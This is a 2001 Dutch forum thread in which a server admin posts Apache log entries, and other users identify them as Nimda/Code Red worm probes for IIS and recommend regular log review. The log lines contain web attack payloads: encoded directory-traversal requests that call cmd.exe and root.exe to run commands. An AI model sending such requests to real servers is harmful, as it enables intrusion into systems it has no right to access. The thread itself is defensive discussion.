Toon posts:

Server aanval of niet???

Pagina: 1
Acties:

Verwijderd

Topicstarter
Ik zit eens in mijn apache log file te loeren en daar vind ik een ip wat mij niet bekend voorkomt en de aanvraag die van dit ip komt lijkt mij ook niet fris. Ik weet het echter niet zeker:

logfile:
212.217.9.132 - - [09/Oct/2001:05:06:24 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:06:28 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:06:39 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:06:48 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:07:01 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-
"
212.217.9.132 - - [09/Oct/2001:05:07:11 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTT
P/1.0" 404 359 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:07:19 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTT
P/1.0" 404 359 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:07:26 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 375 "-" "-"
212.217.9.132 - - [09/Oct/2001:05:09:10 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 "-" "
-"
212.217.9.132 - - [09/Oct/2001:05:10:45 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 "-" "
-"
212.217.9.132 - - [09/Oct/2001:05:14:24 -0400] "-" 408 - "-" "-"


Kan iemand mij vertellen wat dit allemaal betekend?

Verwijderd

Code Red

Verwijderd

das een worm genaamd NIMDA :)

en toen waren we het dus niet eens :)

Code Red heeft toch zoiets als GET/IDA?XXXX of NNNN

Verwijderd

Iemand denkt dat hij met een IIS server heeft te maken en probeert bekende exploits daarvoor uit. Of het is een automatisch script, maar je hoeft je dus geen zorgen over te maken. Behalve de log vervuiling dan :(

Verwijderd

Topicstarter
Ah zoiets d8 ik al, nu weet ik het zeker.
bedankt all.

toch maar goed dat ik over ben gegaan op een linux server met apache. Voel me een stuk veiliger :)

Verwijderd

Op donderdag 11 oktober 2001 15:55 schreef balou het volgende:
Iemand denkt dat hij met een IIS server heeft te maken en probeert bekende exploits daarvoor uit. Of het is een automatisch script, maar je hoeft je dus geen zorgen over te maken. Behalve de log vervuiling dan :(
Ik denk dat je je wel degelijk zorgen moet maken. Nimda maakt in elke map van je HD *.eml *.nws en admin.dll aan. Loze HD wordt dan opgevuld.

Verwijderd

Op donderdag 11 oktober 2001 15:57 schreef LarBor het volgende:
Ah zoiets d8 ik al, nu weet ik het zeker.
bedankt all.

toch maar goed dat ik over ben gegaan op een linux server met apache. Voel me een stuk veiliger :)
Kleine opmerking:
Zo heel veilig hoef je je niet te voelen, als je nu pas achter dergelijke log-entries komt.
Nimda en Code Red komen inmiddels al enkele weken voor.

Zorg ervoor dat je de logfiles van je systeem zo nu en dan eens goed doorneemt, desnoods met behulp van een loganalyzer.
Met af en toe bedoel ik dus niet eens in de maand ofzo ;)

Verwijderd

Op donderdag 11 oktober 2001 16:13 schreef _LOSS_ het volgende:

[..]

Ik denk dat je je wel degelijk zorgen moet maken. Nimda maakt in elke map van je HD *.eml *.nws en admin.dll aan. Loze HD wordt dan opgevuld.
Jaja.....Euhm waarom heb ik daar dan geen last van :?
Hint: check forum/OS ;) En check de webserver die er in dit geval gebruikt wordt.

Verwijderd

Op donderdag 11 oktober 2001 16:13 schreef _LOSS_ het volgende:

[..]

Ik denk dat je je wel degelijk zorgen moet maken. Nimda maakt in elke map van je HD *.eml *.nws en admin.dll aan. Loze HD wordt dan opgevuld.
Ik zei dit omdat de topic starter apache draait. Op een apache server kan de NIMDA worm toch niks aanrichten behalve log vervuiling :?

  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Op donderdag 11 oktober 2001 15:53 schreef LarBor het volgende:
Ik zit eens in mijn apache log file te loeren
[..zooi nimda signatures.].]
Kan iemand mij vertellen wat dit allemaal betekend?
Dat je ergens onder een rots heb gezeten wellicht?

Zoals Nelske al zegt, als je dit nu pas opvalt met alle commotie rond CR en nimda van de afgelopen maanden dan doe je echt iets verkeerd.

een server op *nix/linux/windows is net zo veilig als de admin die de bak beheert.

Pakje cluecookies gaat naar LarBor :P

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • flat
  • Registratie: Mei 2000
  • Niet online
Op donderdag 11 oktober 2001 16:15 schreef nelske het volgende:
Zorg ervoor dat je de logfiles van je systeem zo nu en dan eens goed doorneemt, desnoods met behulp van een loganalyzer.
Met af en toe bedoel ik dus niet eens in de maand ofzo ;)
ik heb hier vaak als ik aan het werken ben een SSH-venster openstaan met "tail -f access_log"

is misschien een beetje overdreven, maar ik zit er niet altijd naar te kijken hoor.
en als ik even iets anders op m'n server moet doen heb ik lekker al een SSH-sessie open, dus dat scheelt weer tijd :)

"Happiness is a way of travel, not a destination."
--Roy Goodman

Pagina: 1